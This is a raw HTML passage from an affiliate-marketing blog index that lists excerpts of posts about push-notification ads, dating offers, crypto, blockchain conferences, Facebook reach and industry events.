data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="megapush-title" data-image-description="" data-medium-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?fit=300%2C181" data-large-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/megapush-title.png?fit=1024%2C616" /> </a> </div> <div class="post-content cf"> <p class="western"><strong>PUSH notification AD format has been gaining lot&#8217;s of traction lately among affiliates from around the world</strong>, being used across multiple verticals and niches. Many see PUSH as the descendent of the POP traffic format, as that has been under scrutiny from Google for a long time … though they are still failing at blocking it and POPs continue to be served in the billions per day 🙂 But whatever happens to POPs, it&#8217;s always a good idea to test a new format, isn&#8217;t it?</p> <h2><span style="color: #ff0000;"><strong>WHAT ARE PUSH NOTIFICATIONS?</strong></span></h2> <p class="western">First of all, <strong>how do these PUSH notifications work?</strong> I&#8217;m sure you&#8217;ve seen one of those small alert windows, asking for your permission to send you notification. It can look like the one on the screenshot below…</p> <p class="western"><img data-attachment-id="631" data-permalink="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/pushnotification-1/" data-orig-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?fit=960%2C507" data-orig-size="960,507" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="pushnotification-1" data-image-description="" data-medium-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?fit=300%2C158" data-large-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?fit=960%2C507" class="aligncenter size-full wp-image-631" src="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?resize=960%2C507" alt="" width="960" height="507" srcset="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?w=960 960w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?resize=300%2C158 300w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/10/pushnotification-1.jpg?resize=768%2C406 768w" sizes="(max-width: 960px) 100vw, 960px" data-recalc-dims="1" /></p> <p class="western"><strong>Once a user grants this permission,</strong> it&#8217;s possible to send them push notification at anytime of the day, as often as you like… regardless of whether they are browsing the site they agreed to get pushes from or not. Obviously, they can still revoke the permission at anytime, so it&#8217;s wise to not abuse the system and keep the amount of pushes at a reasonable rate. <strong>Annoy the users to much and they will “unsubscribe”.</strong> The screen below shows what a push notification message actually looks like, both on a desktop device or mobile phone.</p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/how-to-make-profitable-campaigns-with-push-notification-traffic-from-megapu-sh/">Continue Reading</a></div></p> </div> </div> </article><article id="post-620" class="post-620 post type-post status-publish format-standard has-post-thumbnail hentry category-emailing category-life tag-affiliate-newsletter tag-carousel tag-manu-cinca tag-newsletter tag-wtaff tag-wtaff-com"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/" title="Meet Manu Cinca, founder of the daily Affiliate Newsletter WTAFF.co &#8230; how it started and where is it going?">Meet Manu Cinca, founder of the daily Affiliate Newsletter WTAFF.co &#8230; how it started and where is it going?</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/#respond">No Comments</a> </span> <span class="meta-item menu-item-date"> September 04, 2018 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/" title="Meet Manu Cinca, founder of the daily Affiliate Newsletter WTAFF.co &#8230; how it started and where is it going?"> <img width="1024" height="683" src="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?fit=1024%2C683" class="attachment-large size-large wp-post-image" alt="" srcset="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?w=1650 1650w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?resize=300%2C200 300w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?resize=768%2C512 768w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?resize=1024%2C683 1024w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="623" data-permalink="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/manu-1/" data-orig-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?fit=1650%2C1100" data-orig-size="1650,1100" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;Kevin Moran&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="manu-1" data-image-description="" data-medium-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?fit=300%2C200" data-large-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2018/09/manu-1.jpg?fit=1024%2C683" /> </a> </div> <div class="post-content cf"> <p><strong>Unless you&#8217;ve been living under a rock for the past few months,</strong> you&#8217;ve most likely heard about the WTAFF newsletter &#8230; everyone across the affiliate industry seems to be loving it and for a good reason. Manu puts a lot of work into bringing his readers a quick sum-up of the most important things that relate to affiliate marketing, in one way or another.</p> <p>NOTE: Just for the sake of making sure we are all on the same board &#8230; this is the newsletter I&#8217;m talking about : <strong><a href="https://www.wtaff.co/" target="_blank" rel="noopener">https://www.wtaff.co/</a> </strong>🙂</p> <p>I know Manu for quite some time already, we met at the STM Forum couple years ago and we also met in person several times, be it for business at AWA or AWE, or just to have a few beers in Wien, for example. <strong>So I know that Manu is a great guy,</strong> very clever and business oriented &#8230;</p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/meet-manu-cinca-founder-of-the-daily-affiliate-newsletter-wtaff-co-how-it-started-and-where-is-it-going/">Continue Reading</a></div> </div> </div> </article><article id="post-597" class="post-597 post type-post status-publish format-standard has-post-thumbnail hentry category-basics category-guides category-research tag-adult-dating tag-carousel tag-dating tag-direct-advertisers tag-how-to-promote-dating tag-top-offers tag-topoffers"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/" title="Promoting exclusive dating offers with TopOffers.Com">Promoting exclusive dating offers with TopOffers.Com</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/#respond">No Comments</a> </span> <span class="meta-item menu-item-date"> July 04, 2018 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/" title="Promoting exclusive dating offers with TopOffers.Com"> <img width="800" height="597" src="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?fit=800%2C597" class="attachment-large size-large wp-post-image" alt="" srcset="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?w=800 800w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?resize=300%2C224 300w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?resize=768%2C573 768w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="599" data-permalink="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/topoffers-header/" data-orig-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?fit=800%2C597" data-orig-size="800,597" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="topoffers-header" data-image-description="" data-medium-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?fit=300%2C224" data-large-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2018/07/topoffers-header.png?fit=800%2C597" /> </a> </div> <div class="post-content cf"> <p><strong>Dating, especially the Adult part of it, is a VERY competitive vertical</strong> … but at the same time, it&#8217;s one of the <strong>EVERGREENS</strong>, offers that will always work to some extent. People will always want to date their counterparts, whether their intentions have something to do with a real relationship or just the urge to feel some “human warmth” 🙂</p> <p>I&#8217;ve posted a few blog posts about dating already and today I want to focus on one more thing that can give you the competitive edge … <strong>working with direct advertisers or in other words in-house affiliate programs.</strong></p> <h2><span style="color: #ff0000;"><strong>What&#8217;s the difference between a REGULAR and IN-HOUSE affiliate program?</strong></span></h2> <p><span style="color: #ff0000;"><strong>A standard/regular affiliate program</strong></span> works with a ton of advertisers, they are multi-focused and they make their income <strong>by taking a share</strong> from what the actual advertiser is paying per lead or conversion or whatever they are after …</p> <p><span style="color: #ff0000;"><strong>An in-house affiliate program</strong></span> is actually either directly a part of the advertisers company, or they are close and exclusive partners. So you could say the affiliate program is managed by the same people/company who are also running the offers.<strong> This means they are able to pay a bit more per lead to the affiliates</strong>, since they are funded from the profits that the offers generate and they do not need to financially support another affiliate network.</p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/promoting-exclusive-dating-offers-topoffers-com/">Continue Reading</a></div> </div> </div> </article><article id="post-591" class="post-591 post type-post status-publish format-standard has-post-thumbnail hentry category-events tag-blockchain tag-blockchain-conference tag-carousel tag-crypto tag-crypto-conference"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/looking-higher-level-blockchain-conference/" title="Looking for a higher level Blockchain Conference?">Looking for a higher level Blockchain Conference?</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/looking-higher-level-blockchain-conference/#respond">No Comments</a> </span> <span class="meta-item menu-item-date"> May 25, 2018 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/looking-higher-level-blockchain-conference/" title="Looking for a higher level Blockchain Conference?"> <img width="800" height="459" src="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?fit=800%2C459" class="attachment-large size-large wp-post-image" alt="" srcset="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?w=800 800w, https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?resize=300%2C172 300w, https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?resize=768%2C441 768w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="592" data-permalink="http://www.matuloo.com/looking-higher-level-blockchain-conference/baifconf-main/" data-orig-file="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?fit=800%2C459" data-orig-size="800,459" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="baifconf-main" data-image-description="" data-medium-file="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?fit=300%2C172" data-large-file="https://i0.wp.com/www.matuloo.com/wp-content/uploads/2018/05/baifconf-main.png?fit=800%2C459" /> </a> </div> <div class="post-content cf"> <h2><span style="color: #ff0000;"><strong>Looking for a higher level Blockchain Conference?</strong></span></h2> <p><span style="font-weight: 400;">Last December, <strong>I attended my first Blockchain related conference</strong> which took place in Bangkok, right before the Affiliate World Asia. Knowing that some of the iStack Holding guys (same people who organize AWA) helped with the organization a bit, I had pretty high expectation for the event. And I have to say <strong>I wasn&#8217;t disappointed</strong> &#8230; there were solid speeches, the venue was a nice one, I met tons of interesting people &#8230; simply put, it was definitely worth it to attend the Blockchain World Conference.</span></p> <p><span style="font-weight: 400;">Based on the overall great response that the conference received, <strong>I was expecting some kind of a round 2 and now it&#8217;s about to happen 🙂</strong> So here we go, mark you calendars guys, THE <strong>Blockchain Alternative Investment Conference</strong> (BAIConf) will take place in London on 18</span><span style="font-weight: 400;">th</span><span style="font-weight: 400;"> &#8211; 19</span><span style="font-weight: 400;">th</span><span style="font-weight: 400;"> June.</span></p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/looking-higher-level-blockchain-conference/">Continue Reading</a></div> </div> </div> </article><article id="post-576" class="post-576 post type-post status-publish format-standard has-post-thumbnail hentry category-cryptocurrencies category-events category-life tag-bitcoins tag-blockchain tag-blockchain-conference tag-carousel tag-crypto tag-crypto-coins tag-crypto-currencies tag-ethereum"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/crypto-currencies-new-mass-hysteria-join-or-stay-away/" title="Crypto Currencies – The new mass hysteria, should you join or stay away from it?">Crypto Currencies – The new mass hysteria, should you join or stay away from it?</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/crypto-currencies-new-mass-hysteria-join-or-stay-away/#comments">One Comment</a> </span> <span class="meta-item menu-item-date"> November 21, 2017 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/crypto-currencies-new-mass-hysteria-join-or-stay-away/" title="Crypto Currencies – The new mass hysteria, should you join or stay away from it?"> <img width="800" height="452" src="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?fit=800%2C452" class="attachment-large size-large wp-post-image" alt="" srcset="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?w=800 800w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?resize=300%2C170 300w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?resize=768%2C434 768w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="577" data-permalink="http://www.matuloo.com/crypto-currencies-new-mass-hysteria-join-or-stay-away/crypto/" data-orig-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?fit=800%2C452" data-orig-size="800,452" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Crypto Currency Madness" data-image-description="" data-medium-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?fit=300%2C170" data-large-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/crypto.jpg?fit=800%2C452" /> </a> </div> <div class="post-content cf"> <p><strong>Cryptocurrencies have taken the world by a storm,</strong> and there is no signs of it slowing down. Since I&#8217;m always following the latest trends, I jumped on too, though later than I should have. Are you still standing by and watching the train pass? <strong>Don&#8217;t do that 🙂</strong></p> <p><strong>First of all,</strong> I DO NOT consider myself an expert on the subject, not yet at least, but working on that 🙂 So don&#8217;t take this article as some investment advice please, it&#8217;s more about throwing ideas around and giving you some food for thought.</p> <p>The reason why I actually got involved with Crypto, is because I&#8217;m kinda used to look for opportunities on the internet and the Bitcoin craze was pretty <strong>hard to miss</strong>.</p> <p>We all know that Bitcoin has been around for a few years, since 2009 actually … and we all know that it went through several stages already, many expected it to be dead by now, actually “several times” dead … check this site, they map the articles with Bitcoin deaths prophecies, <strong>it should have been dead 190 times already</strong> :</p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/crypto-currencies-new-mass-hysteria-join-or-stay-away/">Continue Reading</a></div> </div> </div> </article><article id="post-559" class="post-559 post type-post status-publish format-standard has-post-thumbnail hentry category-basics category-case-studies category-research tag-carousel tag-facebook-explore-feed tag-facebook-kills-organic-reach tag-facebook-organic-reach tag-low-organic-reach"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/facebook-killing-organic-reach-of-fb-pages-looks-like/" title="Facebook is about to kill organic reach of FB pages &#8230; or so it looks like.">Facebook is about to kill organic reach of FB pages &#8230; or so it looks like.</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/facebook-killing-organic-reach-of-fb-pages-looks-like/#respond">No Comments</a> </span> <span class="meta-item menu-item-date"> November 10, 2017 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/facebook-killing-organic-reach-of-fb-pages-looks-like/" title="Facebook is about to kill organic reach of FB pages &#8230; or so it looks like."> <img width="800" height="375" src="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?fit=800%2C375" class="attachment-large size-large wp-post-image" alt="" srcset="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?w=800 800w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?resize=300%2C141 300w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?resize=768%2C360 768w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="566" data-permalink="http://www.matuloo.com/facebook-killing-organic-reach-of-fb-pages-looks-like/facebook-down/" data-orig-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?fit=800%2C375" data-orig-size="800,375" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Facebook killing organic reach" data-image-description="" data-medium-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?fit=300%2C141" data-large-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/11/facebook-down.jpg?fit=800%2C375" /> </a> </div> <div class="post-content cf"> <p class="western"><strong>About 3 weeks ago (Oct 20th)</strong>, Facebook rolled out an update in 6 countries, that they chose god knows how as it&#8217;s a rather random list : <strong>Slovakia, Serbia, Bolivia, Guatemala, Cambodia and Sri Lanka</strong>. As I happen to live in Slovakia, I could witness the early effects of the change and I could also follow the reactions of several page admins across the country. To sum it up really quickly, before going into more details : <span style="color: #ff0000;"><strong>IT SUCKS!</strong></span></p> <h2 class="western"><strong><span style="color: #ff0000;">SO WHAT DID THEY CHANGE ACTUALLY?</span></strong></h2> <p class="western">First of all, let me tell you what changes Facebook actually did… there are now 2 news feeds, one is the original news feed that you are used to scroll through, but from now on, there are no posts from Facebook Pages shown in this main feed. These posts are all moved to a new one, called </p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/facebook-killing-organic-reach-of-fb-pages-looks-like/">Continue Reading</a></div></p> </div> </div> </article><article id="post-543" class="post-543 post type-post status-publish format-standard has-post-thumbnail hentry category-events category-life tag-adult-affiliate-conference tag-adult-dating tag-adult-traffic tag-carousel tag-carrier-billing tag-the-european-summit"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/adult-affiliate-marketing-2017-heading/" title="Adult Affiliate Marketing in 2017, where is it heading?">Adult Affiliate Marketing in 2017, where is it heading?</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/adult-affiliate-marketing-2017-heading/#comments">3 Comments</a> </span> <span class="meta-item menu-item-date"> September 21, 2017 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/adult-affiliate-marketing-2017-heading/" title="Adult Affiliate Marketing in 2017, where is it heading?"> <img width="1024" height="684" src="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?fit=1024%2C684" class="attachment-large size-large wp-post-image" alt="" srcset="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?w=1024 1024w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?resize=300%2C200 300w, https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?resize=768%2C513 768w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="544" data-permalink="http://www.matuloo.com/adult-affiliate-marketing-2017-heading/bonga/" data-orig-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?fit=1024%2C684" data-orig-size="1024,684" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The European Summit Models" data-image-description="" data-medium-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?fit=300%2C200" data-large-file="https://i1.wp.com/www.matuloo.com/wp-content/uploads/2017/09/bonga.jpg?fit=1024%2C684" /> </a> </div> <div class="post-content cf"> <h2><span style="color: #ff0000;"><b>RUNNING ANY ADULT TRAFFIC?</b></span></h2> <p><strong>I just returned from Prague the other day,</strong> where I attended The European Summit (TES) Conference. TES was the first affiliate conference I ever attended, and I keep on returning there ever since … been there like 5 or 6 times already. This conference started as an <b>ADULT only event</b>, but for the past few years, the organizers tried to venture out to more areas of digital marketing.</p> <p>However, it still has the adult feel to it, with all the hot and barely dressed models walking around, and waste majority of the exhibitors are adult companies too. Most of the affiliates that you can meet here are adult affiliates as well. That&#8217;s why I keep on attending this event from time to time, <b>to stay in touch with the adult industry</b> and to see where it is going.</p> <p><b><span style="color: #ff0000;"><span style="font-size: x-large;">SO WHERE IS THE ADULT INDUSTRY GOING AT THE END OF 2017?</span></span></b></p> <p>For the past few years, the whole adult traffic segment <b>was dominated with MOBILE</b>… it was everywhere, mobile traffic networks, mobile affiliate networks … mobile this, mobile that … And this has changed this year. No more huge booths from the market leaders, they been present still, but on a much smaller scale.</p> <p>It&#8217;s clearly visible that the regulations <b>have hit the <a href="http://www.matuloo.com/how-to-profit-from-carrier-billing-offers-with-kimia/">Carrier Billing Adult offers</a></b> pretty hard. Large part of them moved to the mainstream side of things, where the regulations ain&#8217;t that heavy yet. Or let&#8217;s just say, mainstream offers can run in more GEOs than adult products – <b>think about the Arab world or some large Asian countries</b>.</p> <p>I&#8217;ve seen the traditional, <b>cover-all <a href="http://www.matuloo.com/what-is-an-affiliate-network-and-should-you-be-using-them-at-all/">Affiliate Networks</a></b>, trying to get some more business going with the adult crowd … </p> <div class="post-readmore"><a class="more-link" href="http://www.matuloo.com/adult-affiliate-marketing-2017-heading/">Continue Reading</a></div> </div> </div> </article><article id="post-536" class="post-536 post type-post status-publish format-standard has-post-thumbnail hentry category-events category-uncategorized tag-carousel tag-leadbit tag-moscow-affiliate-conference tag-moscow-conference"> <div class="post-wrap cf"> <header class="post-header"> <h2 class="post-title"> <a href="http://www.matuloo.com/moscow-affiliate-conference-party-autumn-2017-edition/" title="Moscow Affiliate Conference and Party Autumn 2017 Edition.">Moscow Affiliate Conference and Party Autumn 2017 Edition.</a> </h2><!-- .post-title --> <div class="post-meta"> <div class="post-meta-inner"> <span class="meta-item menu-item-author"> <span class="posted-by">Posted By </span> <a href="http://www.matuloo.com/author/matuloo/" title="Posts by Matuloo" rel="author">Matuloo</a> </span> <span class="meta-item menu-item-comment"> <a href="http://www.matuloo.com/moscow-affiliate-conference-party-autumn-2017-edition/#respond">No Comments</a> </span> <span class="meta-item menu-item-date"> September 13, 2017 </span> </div> </div><!-- .post-meta --> </header> <div class="post-image"> <a href="http://www.matuloo.com/moscow-affiliate-conference-party-autumn-2017-edition/" title="Moscow Affiliate Conference and Party Autumn 2017 Edition."> <img width="800" height="517" src="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?fit=800%2C517" class="attachment-large size-large wp-post-image" alt="" srcset="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?w=800 800w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?resize=300%2C194 300w, https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?resize=768%2C496 768w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="540" data-permalink="http://www.matuloo.com/moscow-affiliate-conference-party-autumn-2017-edition/leadbit-2/" data-orig-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?fit=800%2C517" data-orig-size="800,517" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Leadbit Moscow Conference Autumn" data-image-description="" data-medium-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?fit=300%2C194" data-large-file="https://i2.wp.com/www.matuloo.com/wp-content/uploads/2017/09/leadbit-2.jpg?fit=800%2C517" /> </a> </div> <div class="post-content cf"> <h2><span style="color: #ff0000;"><strong>Looking for an affiliate conference to attend in September?</strong> </span></h2> <p>Leadbit is back with round 2 of their Moscow conference, again in co-operation with the <strong>STM Forum folks</strong>. Everything is expected to be bigger this time … more speakers, more exhibitors, bigger party …</p> <p>Entrance is still free for affiliates, but you have to register here and mention that you are an affiliate : <strong><a 